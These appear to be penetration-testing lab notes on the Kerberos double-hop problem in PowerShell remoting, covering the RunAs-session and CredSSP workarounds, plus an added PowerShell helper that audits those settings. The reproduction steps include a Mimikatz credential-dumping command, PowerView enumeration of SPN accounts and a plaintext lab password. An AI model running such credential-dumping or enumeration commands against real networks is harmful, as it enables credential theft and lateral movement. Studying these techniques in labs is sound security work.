21. Kerberos Double Hop Problem
Overview
The Kerberos "Double Hop" problem occurs when a user authenticates to a remote system using Kerberos, but their credentials cannot be forwarded to a second system from that remote session. This is a common issue in scenarios involving WinRM, PowerShell remoting, and multi-tier authentication setups.
Scenario
A user connects from a local machine to DEV01 using PowerShell remoting. They then attempt to access a third system from DEV01, but authentication fails because the remote session on DEV01 cannot forward the user's Kerberos credentials to the next host.
Steps to Reproduce
Establish a WinRM Session to DEV01
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm
Change Directory
cd 'C:\Users\Public\'
Run Mimikatz to View Credentials (Requires Privileged Access)
.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
List Processes for a Specific User
tasklist /V | findstr backupadm
Check Kerberos Ticket Cache
klist
Import PowerView Module
Import-Module .\PowerView.ps1
Enumerate Domain Users with SPNs
Get-DomainUser -SPN
Create a Secure Credential Object
$SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)
Query Domain Users with SPNs Using Credentials
Get-DomainUser -SPN -Credential $Cred | Select-Object samaccountname
Register a New PSSession Configuration to Enable Credential Delegation
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential INLANEFREIGHT\backupadm
Restart WinRM Service
Restart-Service WinRM
Enter PSSession Using the Registered Configuration
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess
Solution: CredSSP Authentication
To bypass the Kerberos double-hop issue, enable CredSSP Authentication, which allows credentials to be delegated securely.
Steps to Enable CredSSP
On the Client Machine
Enable-WSManCredSSP -Role Client -DelegateComputer DEV01
On the Remote Server (DEV01)
Enable-WSManCredSSP -Role Server
Run PowerShell Remoting with CredSSP
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -Authentication CredSSP
Verify CredSSP Configuration
Get-WSManCredSSP
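An added example, not part of the original notes: a PowerShell audit helper that reports whether the two workarounds above (a RunAs session configuration and CredSSP) are active on a host, so they can be rolled back when no longer needed. The function name Get-DoubleHopExposure is hypothetical; run it in an elevated session on the host being checked.

```powershell
# Added example (not from the original page). Requires an elevated session.
# Get-DoubleHopExposure is a hypothetical helper name.
function Get-DoubleHopExposure {
    [CmdletBinding()]
    param()

    # CredSSP toggles exposed by the WSMan provider ('true' / 'false' strings).
    $clientCredSSP = (Get-Item -Path WSMan:\localhost\Client\Auth\CredSSP).Value
    $serverCredSSP = (Get-Item -Path WSMan:\localhost\Service\Auth\CredSSP).Value

    # Enable-WSManCredSSP -Role Client records its delegation targets
    # (for example wsman/DEV01) under the AllowFreshCredentials policy key.
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation\AllowFreshCredentials'
    $targets = @()
    if (Test-Path -Path $policyKey) {
        $key = Get-Item -Path $policyKey
        $targets = @($key.GetValueNames() | ForEach-Object { $key.GetValue($_) })
    }

    # Session configurations registered with -RunAsCredential keep a stored
    # account; anyone permitted to connect runs commands as that account.
    $runAsConfigs = @(Get-PSSessionConfiguration |
        Where-Object { $_.RunAsUser } |
        Select-Object -Property Name, RunAsUser, Permission)

    [pscustomobject]@{
        ComputerName         = $env:COMPUTERNAME
        CredSSPClientEnabled = ($clientCredSSP -eq 'true')
        CredSSPServerEnabled = ($serverCredSSP -eq 'true')
        DelegationTargets    = $targets
        # A target such as wsman/* delegates credentials to any host.
        WildcardDelegation   = [bool]($targets -like '*[*]*')
        RunAsSessionConfigs  = $runAsConfigs
    }
}

Get-DoubleHopExposure | Format-List

# Roll back anything that is no longer needed:
#   Disable-WSManCredSSP -Role Client
#   Disable-WSManCredSSP -Role Server
#   Unregister-PSSessionConfiguration -Name backupadmsess
```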
Alternative Solution: Kerberos Constrained Delegation (KCD)
Instead of using CredSSP, Kerberos Constrained Delegation (KCD) can be configured for more secure credential forwarding. This requires modifying Active Directory settings to allow a service account to delegate authentication to specific services.
Conclusion
The Kerberos "Double Hop" issue is a common obstacle in multi-hop authentication scenarios. Enabling CredSSP or configuring Kerberos Constrained Delegation can help mitigate this issue while maintaining security.